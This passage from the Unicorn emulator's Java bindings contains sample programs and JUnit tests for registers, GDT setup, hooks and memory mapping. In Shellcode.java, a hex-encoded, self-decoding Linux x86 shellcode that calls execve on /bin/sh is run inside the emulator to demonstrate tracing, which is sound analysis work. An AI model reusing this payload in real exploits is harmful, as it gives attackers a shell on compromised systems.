test_i386_jump(); System.out.println("==================================="); test_i386_loop(); System.out.println("==================================="); test_i386_invalid_mem_read(); System.out.println("==================================="); test_i386_invalid_mem_write(); System.out.println("==================================="); test_i386_jump_invalid(); // test_i386_invalid_c6c7(); System.out.println("==================================="); test_x86_64(); System.out.println("==================================="); test_x86_64_syscall(); System.out.println("==================================="); test_i386_invalid_mem_read_in_tb(); System.out.println("==================================="); test_i386_smc_xor(); System.out.println("==================================="); test_i386_mmio(); System.out.println("==================================="); 
test_i386_hook_mem_invalid(); } } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_x86_mmr.java000066400000000000000000000204441467524106700255250ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Sample code to demonstrate how to register read/write API */ package samples; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.util.Arrays; import unicorn.*; public class Sample_x86_mmr implements UnicornConst, X86Const { private static final MemHook hook_mem = (uc, type, address, size, value, user_data) -> { switch (type) { case UC_MEM_WRITE: System.out.format( "mem write at 0x%x, size = %d, value = 0x%x\n", address, size, value); break; default: break; } }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format("Executing at 0x%x, ilen = 0x%x\n", address, size); }; public static class SegmentDescriptor { public static final int BYTES = 8; int base; int limit; byte type; // 4 bits byte system; // 1 bit: S flag byte dpl; // 2 bits byte present; // 1 bit: P flag byte avail; // 1 bit byte is_64_code; // 1 bit: L flag byte db; // 1 bit: DB flag byte granularity; // 1 bit: G flag public SegmentDescriptor() { } // VERY basic descriptor init function, sets many fields to user space sane // defaults public SegmentDescriptor(int base, int limit, boolean is_code) { this.base = base; if (limit > 0xfffff) { // need Giant granularity limit >>= 12; this.granularity = 1; } this.limit = limit; // some sane defaults this.dpl = 3; this.present = 1; this.db = 1; // 32 bit this.type = is_code ? 
(byte) 0xb : 3; this.system = 1; // code or data } public void appendToBuffer(ByteBuffer buf) { buf.putShort((short) limit); buf.putShort((short) base); buf.put((byte) (base >>> 16)); buf.put( (byte) (type | (system << 4) | (dpl << 5) | (present << 7))); buf.put((byte) (((limit >>> 16) & 0xf) | (avail << 4) | (is_64_code << 5) | (db << 6) | (granularity << 7))); buf.put((byte) (base >>> 24)); } } public static void test_x86_mmr() { System.out.println("Test x86 MMR read/write"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 4k uc.mem_map(0x400000, 0x1000, UC_PROT_ALL); X86_MMR ldtr1 = new X86_MMR(0x1111111122222222L, 0x33333333, 0x44444444, (short) 0x5555); X86_MMR ldtr2; X86_MMR gdtr1 = new X86_MMR(0x6666666677777777L, 0x88888888, 0x99999999, (short) 0xaaaa); X86_MMR gdtr2; long eax; // initialize machine registers uc.reg_write(UC_X86_REG_LDTR, ldtr1); uc.reg_write(UC_X86_REG_GDTR, gdtr1); uc.reg_write(UC_X86_REG_EAX, 0xddddddddL); // read the registers back out eax = uc.reg_read(UC_X86_REG_EAX); ldtr2 = (X86_MMR) uc.reg_read(UC_X86_REG_LDTR, null); gdtr2 = (X86_MMR) uc.reg_read(UC_X86_REG_GDTR, null); System.out.printf(">>> EAX = 0x%x\n", eax); System.out.printf(">>> LDTR.base = 0x%x\n", ldtr2.base); System.out.printf(">>> LDTR.limit = 0x%x\n", ldtr2.limit); System.out.printf(">>> LDTR.flags = 0x%x\n", ldtr2.flags); System.out.printf(">>> LDTR.selector = 0x%x\n\n", ldtr2.selector); System.out.printf(">>> GDTR.base = 0x%x\n", gdtr2.base); System.out.printf(">>> GDTR.limit = 0x%x\n", gdtr2.limit); } public static void gdt_demo() { System.out.println("Demonstrate GDT usage"); /* bits 32 push dword 0x01234567 push dword 0x89abcdef mov dword [fs:0], 0x01234567 mov dword [fs:4], 0x89abcdef */ final byte[] code = Utils.hexToBytes("686745230168efcdab8964c70500000000" + "6745230164c70504000000efcdab89"); final long code_address = 0x1000000L; final long stack_address = 0x120000L; final long gdt_address = 0xc0000000L; final long fs_address = 0x7efdd000L; SegmentDescriptor[] gdt = new SegmentDescriptor[31]; int r_esp = (int) stack_address + 0x1000; // initial esp int r_cs = 0x73; int r_ss = 0x88; // ring 0 int r_ds = 0x7b; int r_es = 0x7b; int r_fs = 0x83; X86_MMR gdtr = new X86_MMR(gdt_address, gdt.length * SegmentDescriptor.BYTES - 1); gdt[14] = new SegmentDescriptor(0, 0xfffff000, true); // code segment gdt[15] = new SegmentDescriptor(0, 0xfffff000, false); // data segment gdt[16] = new SegmentDescriptor((int) fs_address, 0xfff, false); // one page data segment simulate fs gdt[17] = new SegmentDescriptor(0, 0xfffff000, false); // ring 0 data gdt[17].dpl = 0; // set descriptor privilege level // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); uc.hook_add(hook_code, code_address, code_address + code.length, null); uc.hook_add(hook_mem, UC_HOOK_MEM_WRITE, 1, 0, null); // map 1 page of code for this emulation uc.mem_map(code_address, 0x1000, UC_PROT_ALL); // map 1 page of stack for this emulation uc.mem_map(stack_address, 0x1000, UC_PROT_READ | UC_PROT_WRITE); // map 64k for a GDT uc.mem_map(gdt_address, 0x10000, UC_PROT_WRITE | UC_PROT_READ); // set up a GDT BEFORE you manipulate any segment registers uc.reg_write(UC_X86_REG_GDTR, gdtr); // write gdt to be emulated to memory ByteBuffer gdt_buf = ByteBuffer.allocate(gdt.length * SegmentDescriptor.BYTES) .order(ByteOrder.LITTLE_ENDIAN); for (SegmentDescriptor desc : gdt) { if (desc == null) { gdt_buf.put(new byte[SegmentDescriptor.BYTES]); } else { 
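                /* pack base/limit/flags into the raw 8-byte descriptor layout the CPU expects */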
desc.appendToBuffer(gdt_buf); } } uc.mem_write(gdt_address, gdt_buf.array()); // map 1 page for FS uc.mem_map(fs_address, 0x1000, UC_PROT_WRITE | UC_PROT_READ); // write machine code to be emulated to memory uc.mem_write(code_address, code); // initialize machine registers uc.reg_write(UC_X86_REG_ESP, r_esp); // when setting SS, need rpl == cpl && dpl == cpl // emulator starts with cpl == 0, so we need a dpl 0 descriptor and rpl 0 // selector uc.reg_write(UC_X86_REG_SS, r_ss); uc.reg_write(UC_X86_REG_CS, r_cs); uc.reg_write(UC_X86_REG_DS, r_ds); uc.reg_write(UC_X86_REG_ES, r_es); uc.reg_write(UC_X86_REG_FS, r_fs); // emulate machine code in infinite time uc.emu_start(code_address, code_address + code.length, 0, 0); // read from memory byte[] buf = uc.mem_read(r_esp - 8, 8); for (int i = 0; i < 8; i++) { System.out.format("%02x", buf[i] & 0xff); } System.out.println(); assert Arrays.equals(buf, Utils.hexToBytes("efcdab8967452301")); // read from memory buf = uc.mem_read(fs_address, 8); assert Arrays.equals(buf, Utils.hexToBytes("67452301efcdab89")); } public static void main(String args[]) { test_x86_mmr(); System.out.println("==================================="); gdt_demo(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Shellcode.java000066400000000000000000000110671467524106700246270ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to trace Linux shellcode that invokes a syscall */ package samples; import unicorn.*; public class Shellcode implements UnicornConst, X86Const { public static final byte[] X86_CODE32_SELF = Utils.hexToBytes( "eb1c5a89d68b02663dca7d75066605030389" + "02fec23d4141414175e9ffe6e8dfffffff31" + "d26a0b589952682f2f7368682f62696e89e3" + "525389e1ca7d4141414141414141"); // memory address where emulation starts public static final int ADDRESS = 0x1000000; public static CodeHook hook_code = (u, address, size, user) -> { System.out.format( "Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); long r_eip = u.reg_read(UC_X86_REG_EIP); System.out.format("*** EIP = %x ***: ", r_eip); byte[] tmp = u.mem_read(address, size); for (int i = 0; i < tmp.length; i++) { System.out.format("%x ", 0xff & tmp[i]); } System.out.println(); }; public static InterruptHook hook_intr = (u, intno, user) -> { // only handle Linux syscall if (intno != 0x80) { return; } long r_eax = u.reg_read(UC_X86_REG_EAX); long r_eip = u.reg_read(UC_X86_REG_EIP); switch ((int) r_eax) { default: System.out.format(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip, intno, r_eax); break; case 1: // sys_exit System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_EXIT. 
quit!\n\n", r_eip, intno); u.emu_stop(); break; case 4: { // sys_write // ECX = buffer address long r_ecx = u.reg_read(UC_X86_REG_ECX); // EDX = buffer size long r_edx = u.reg_read(UC_X86_REG_EDX); // read the buffer in int size = (int) Math.min(256, r_edx); try { byte[] buffer = u.mem_read(r_ecx, size); System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = '%s'\n", r_eip, intno, r_ecx, r_edx, new String(buffer)); } catch (UnicornException e) { System.out.format( ">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u (cannot get content)\n", r_eip, intno, r_ecx, r_edx); } break; } } }; public static void test_i386() { long r_esp = ADDRESS + 0x200000L; // ESP register System.out.println("Emulate i386 code"); // Initialize emulator in X86-32bit mode Unicorn u = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, X86_CODE32_SELF); // initialize machine registers u.reg_write(UC_X86_REG_ESP, r_esp); // tracing all instructions by having @begin > @end u.hook_add(hook_code, 1, 0, null); // handle interrupt ourself u.hook_add(hook_intr, null); System.out.println("\n>>> Start tracing this Linux code"); // emulate machine code in infinite time // u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 12); <--- emulate only 12 instructions u.emu_start(ADDRESS, ADDRESS + X86_CODE32_SELF.length, 0, 0); System.out.println("\n>>> Emulation done."); } public static void main(String args[]) { if (args.length == 1) { if ("-32".equals(args[0])) { test_i386(); } } else { System.out.println("Syntax: java Shellcode <-32|-64>"); } } } unicorn-2.1.1/bindings/java/src/test/java/samples/Utils.java000066400000000000000000000024021467524106700240160ustar00rootroot00000000000000package samples; public class Utils { public static byte[] hexToBytes(String s) { int len = s.length(); byte[] data = new byte[len / 2]; for (int i = 0; i < len; i += 2) { data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); } return data; } public static final int toInt(byte val[]) { int res = 0; for (int i = 0; i < val.length; i++) { int v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final long toLong(byte val[]) { long res = 0; for (int i = 0; i < val.length; i++) { long v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final byte[] toBytes(int val) { byte[] res = new byte[4]; for (int i = 0; i < 4; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } public static final byte[] toBytes(long val) { byte[] res = new byte[8]; for (int i = 0; i < 8; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } } unicorn-2.1.1/bindings/java/src/test/java/tests/000077500000000000000000000000001467524106700215535ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/tests/FunctionalityTests.java000066400000000000000000000166411467524106700263010ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertThrows; import static org.junit.Assert.assertTrue; import org.junit.Test; import unicorn.Unicorn; import unicorn.UnicornException; /** Test miscellaneous features that don't fall into the register, memory * or hook API */ public class FunctionalityTests { @Test public void testStatics() { assertEquals(true, Unicorn.arch_supported(Unicorn.UC_ARCH_X86)); 
assertEquals(false, Unicorn.arch_supported(Unicorn.UC_ARCH_MAX + 1)); assertTrue("version check", Unicorn.version() >= 0x02000100); assertEquals("OK (UC_ERR_OK)", Unicorn.strerror(Unicorn.UC_ERR_OK)); assertEquals("Invalid handle (UC_ERR_HANDLE)", Unicorn.strerror(Unicorn.UC_ERR_HANDLE)); } @Test public void testCreation() { assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_MAX + 1, 0)); if (Unicorn.arch_supported(Unicorn.UC_ARCH_X86)) { new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_16); new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_BIG_ENDIAN)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_M68K)) { new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_BIG_ENDIAN); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_LITTLE_ENDIAN)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_ARM)) { new Unicorn(Unicorn.UC_ARCH_ARM, 0); new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_BIG_ENDIAN); new Unicorn(Unicorn.UC_ARCH_ARM, Unicorn.UC_MODE_THUMB); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_ARM64)) { new Unicorn(Unicorn.UC_ARCH_ARM64, 0); new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_BIG_ENDIAN); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_MIPS)) { new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_16)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_SPARC)) { new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_PPC)) { new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_BIG_ENDIAN | Unicorn.UC_MODE_64); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_PPC, Unicorn.UC_MODE_LITTLE_ENDIAN | Unicorn.UC_MODE_32)); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_RISCV)) { new Unicorn(Unicorn.UC_ARCH_RISCV, Unicorn.UC_MODE_32); new Unicorn(Unicorn.UC_ARCH_RISCV, Unicorn.UC_MODE_64); } if (Unicorn.arch_supported(Unicorn.UC_ARCH_S390X)) { new Unicorn(Unicorn.UC_ARCH_S390X, Unicorn.UC_MODE_BIG_ENDIAN); assertThrows(UnicornException.class, () -> new Unicorn(Unicorn.UC_ARCH_S390X, Unicorn.UC_MODE_LITTLE_ENDIAN)); new Unicorn(Unicorn.UC_ARCH_TRICORE, 0); } } @Test public void testThreading() { // EB FE - label: jmp label final byte[] X86_CODE = { -21, -2 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); new Thread(() -> { try { Thread.sleep(500); } catch (InterruptedException e) { e.printStackTrace(); } u.emu_stop(); }).start(); u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); } @Test public void testContext() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); 
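        /* Context objects snapshot the full CPU state: context_save() allocates a snapshot, context_restore() copies it back into the engine, and context_update() refreshes an existing snapshot from the engine. */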
uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); Unicorn.Context ctx = uc.context_save(); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfeedfaceL); assertEquals(0xfeedfaceL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfee1deadL); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xdeadbeefL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_update(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); assertEquals(0xfee1deadL, ctx.reg_read(Unicorn.UC_ARM64_REG_X0)); } @Test public void testOldContext() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); long ctx = uc.context_alloc(); uc.context_save(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfeedfaceL); assertEquals(0xfeedfaceL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xfee1deadL); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_save(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.reg_write(Unicorn.UC_ARM64_REG_X0, 0xdeadbeefL); assertEquals(0xdeadbeefL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.context_restore(ctx); assertEquals(0xfee1deadL, uc.reg_read(Unicorn.UC_ARM64_REG_X0)); uc.free(ctx); } } unicorn-2.1.1/bindings/java/src/test/java/tests/HookTests.java000066400000000000000000000114221467524106700243410ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertThrows; import org.junit.Test; import unicorn.CodeHook; import unicorn.EdgeGeneratedHook; import unicorn.TlbFillHook; import unicorn.TranslationBlock; import unicorn.Unicorn; import unicorn.UnicornException; public class HookTests { private static void assertTranslationBlock(TranslationBlock expected, TranslationBlock actual) { assertEquals(expected.pc, actual.pc); assertEquals(expected.icount, actual.icount); assertEquals(expected.size, actual.size); } @Test public void testEdgeHook() { /* 00000000 83FB01 cmp ebx,byte +0x1 00000003 7405 jz 0xa 00000005 B802000000 mov eax,0x2 0000000A 40 inc eax 0000000B EBFE jmp short 0xb */ final byte[] X86_CODE = { -125, -5, 1, 116, 5, -72, 2, 0, 0, 0, 64, -21, -2 }; final TranslationBlock[] expectedTb = { null, null }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); expectedTb[1] = new TranslationBlock(ADDRESS, 2, 5); u.hook_add((EdgeGeneratedHook) (uc, cur_tb, prev_tb, user) -> { assertTranslationBlock(expectedTb[0], cur_tb); assertTranslationBlock(expectedTb[1], prev_tb); 
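            /* cur_tb is the newly generated block; prev_tb is the block whose outgoing edge triggered the translation */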
assertEquals("user data", user); }, ADDRESS, ADDRESS + 10, "user data"); // TODO(nneonneo): why is icount 2/3 in the subsequent blocks? expectedTb[0] = new TranslationBlock(ADDRESS + 10, 2, 1); u.reg_write(Unicorn.UC_X86_REG_EBX, 1); u.emu_start(ADDRESS, ADDRESS + 11, 0, 0); expectedTb[0] = new TranslationBlock(ADDRESS + 5, 3, 6); u.reg_write(Unicorn.UC_X86_REG_EBX, 0); u.emu_start(ADDRESS, ADDRESS + 11, 0, 0); assertTranslationBlock(new TranslationBlock(ADDRESS, 2, 5), u.ctl_request_cache(ADDRESS)); // TODO(nneonneo): I don't totally understand this output! Why 8 bytes at address 5? assertTranslationBlock(new TranslationBlock(ADDRESS + 5, 3, 8), u.ctl_request_cache(ADDRESS + 5)); } @Test public void testTlbHook() { // mov ecx, [0xaaaaaaa8] final byte[] X86_CODE32_MEM_READ = { -117, 13, -88, -86, -86, -86 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_map(0xbbbbb000L, 0x1000, Unicorn.UC_PROT_READ); u.hook_add((TlbFillHook) (uc, address, type, user_data) -> { assertEquals("fill hook address", 0xaaaaa000L, address); assertEquals("fill hook type", Unicorn.UC_MEM_READ, type); assertEquals("fill hook user", "fill_hook", user_data); return 0xbbbbb000L | Unicorn.UC_PROT_READ; }, 0xaaaaa000L, 0xaaaab000L, "fill_hook"); u.mem_write(ADDRESS, X86_CODE32_MEM_READ); u.mem_write(0xbbbbbaa8L, new byte[] { 1, 2, 3, 4 }); u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); u.ctl_tlb_mode(Unicorn.UC_TLB_VIRTUAL); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); assertEquals("ecx", u.reg_read(Unicorn.UC_X86_REG_ECX), 0x04030201); } @Test public void testRemoveHook() { byte[] X86_CODE = { 0x40, 0x40, 0x40, 0x40 }; // (inc eax) x 4 int ADDRESS = 0x10000; final int[] hook_accum = { 0 }; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); u.mem_write(ADDRESS, X86_CODE); CodeHook hook = (uc, address, size, user) -> hook_accum[0] += (int) user; long h1 = u.hook_add(hook, ADDRESS, ADDRESS, 1); long h2 = u.hook_add(hook, ADDRESS + 1, ADDRESS + 1, 2); long h3 = u.hook_add(hook, ADDRESS + 2, ADDRESS + 2, 4); long h4 = u.hook_add(hook, ADDRESS + 3, ADDRESS + 3, 8); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(15, hook_accum[0]); u.hook_del(h2); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(13, hook_accum[0]); u.hook_del(hook); hook_accum[0] = 0; u.emu_start(ADDRESS, ADDRESS + X86_CODE.length, 0, 0); assertEquals(0, hook_accum[0]); assertThrows(UnicornException.class, () -> u.hook_del(h1)); assertThrows(UnicornException.class, () -> u.hook_del(h3)); assertThrows(UnicornException.class, () -> u.hook_del(h4)); } } unicorn-2.1.1/bindings/java/src/test/java/tests/MemTests.java000066400000000000000000000123561467524106700241660ustar00rootroot00000000000000package tests; import static org.junit.Assert.assertEquals; import java.nio.ByteBuffer; import java.nio.ByteOrder; import org.junit.Test; import unicorn.MemRegion; import unicorn.Unicorn; public class MemTests { private static void assertMemRegion(long address, long size, int perms, MemRegion actual) { assertEquals(address, actual.begin); assertEquals(address + size - 1, actual.end); assertEquals(perms, actual.perms); } @Test public void testMemRegions() { Unicorn uc = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); long ADDR1 = 0x10000; long ADDR2 = 0xdeadbeeffeed1000L; uc.mem_map(ADDR1, 2 
* 1024 * 1024, Unicorn.UC_PROT_ALL); uc.mem_map(ADDR2, 4096, Unicorn.UC_PROT_READ); MemRegion[] arr = uc.mem_regions(); assertEquals("two memory regions", 2, arr.length); assertMemRegion(ADDR1, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL, arr[0]); assertMemRegion(ADDR2, 4096, Unicorn.UC_PROT_READ, arr[1]); } @Test public void testMemRegions2() { Unicorn u = new Unicorn(Unicorn.UC_ARCH_TRICORE, 0); u.mem_map(0x10000, 0x10000, Unicorn.UC_PROT_ALL); u.mem_map(0x30000, 0x10000, Unicorn.UC_PROT_READ); u.mem_map(0x50000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE); u.mem_map(0x70000, 0x20000, 0); u.mem_protect(0x80000, 0x10000, Unicorn.UC_PROT_EXEC); ByteBuffer buf = ByteBuffer.allocateDirect(0x10000); u.mem_map_ptr(0x110000, buf, Unicorn.UC_PROT_ALL); u.mmio_map(0x210000, 0x10000, (uc, offset, size, user_data) -> 0x41414141, null, (uc, offset, size, value, user_data) -> { }, null); u.mmio_map(0x230000, 0x10000, (uc, offset, size, user_data) -> 0x41414141, null, null, null); u.mmio_map(0x250000, 0x10000, null, null, (uc, offset, size, value, user_data) -> { }, null); u.mmio_map(0x270000, 0x10000, null, null, null, null); MemRegion[] mrs = u.mem_regions(); assertEquals(10, mrs.length); assertMemRegion(0x10000, 0x10000, Unicorn.UC_PROT_ALL, mrs[0]); assertMemRegion(0x30000, 0x10000, Unicorn.UC_PROT_READ, mrs[1]); assertMemRegion(0x50000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE, mrs[2]); assertMemRegion(0x70000, 0x10000, Unicorn.UC_PROT_NONE, mrs[3]); assertMemRegion(0x80000, 0x10000, Unicorn.UC_PROT_EXEC, mrs[4]); assertMemRegion(0x110000, 0x10000, Unicorn.UC_PROT_ALL, mrs[5]); assertMemRegion(0x210000, 0x10000, Unicorn.UC_PROT_READ | Unicorn.UC_PROT_WRITE, mrs[6]); assertMemRegion(0x230000, 0x10000, Unicorn.UC_PROT_READ, mrs[7]); assertMemRegion(0x250000, 0x10000, Unicorn.UC_PROT_WRITE, mrs[8]); assertMemRegion(0x270000, 0x10000, Unicorn.UC_PROT_NONE, mrs[9]); } @Test public void testMmio() { // mov ecx, [0xaaaaaaa8]; inc ecx; dec edx; mov [0xaaaaaaa8], ecx; inc ecx; dec edx final byte[] X86_CODE32_MEM_READ_WRITE = { -117, 13, -88, -86, -86, -86, 65, 74, -119, 13, -88, -86, -86, -86, 65, 74 }; long ADDRESS = 0x100000; Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, X86_CODE32_MEM_READ_WRITE); // initialize machine registers u.reg_write(Unicorn.UC_X86_REG_ECX, 0x12345678); u.reg_write(Unicorn.UC_X86_REG_EDX, 0x22334455); u.mmio_map(0xaaaaa000L, 0x1000, (uc, offset, size, user_data) -> { assertEquals("read offset", 0xaa8, offset); assertEquals("read size", 4, size); assertEquals("read user_data", "read_data", user_data); return 0x44556677; }, "read_data", (uc, offset, size, value, user_data) -> { assertEquals("write offset", 0xaa8, offset); assertEquals("write size", 4, size); assertEquals("write value", 0x44556678, value); assertEquals("write user_data", "write_data", user_data); }, "write_data"); u.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ_WRITE.length, 0, 0); assertEquals("ecx", 0x44556679, u.reg_read(Unicorn.UC_X86_REG_ECX)); assertEquals("edx", 0x22334453, u.reg_read(Unicorn.UC_X86_REG_EDX)); } @Test public void testMemMapPtr() { ByteBuffer buffer = ByteBuffer.allocateDirect(0x1000).order(ByteOrder.LITTLE_ENDIAN); final byte[] X86_CODE32_MEM_WRITE = { -119, 13, -86, -86, -86, -86, 65, 74 }; long ADDRESS = 0x100000; Unicorn u = new 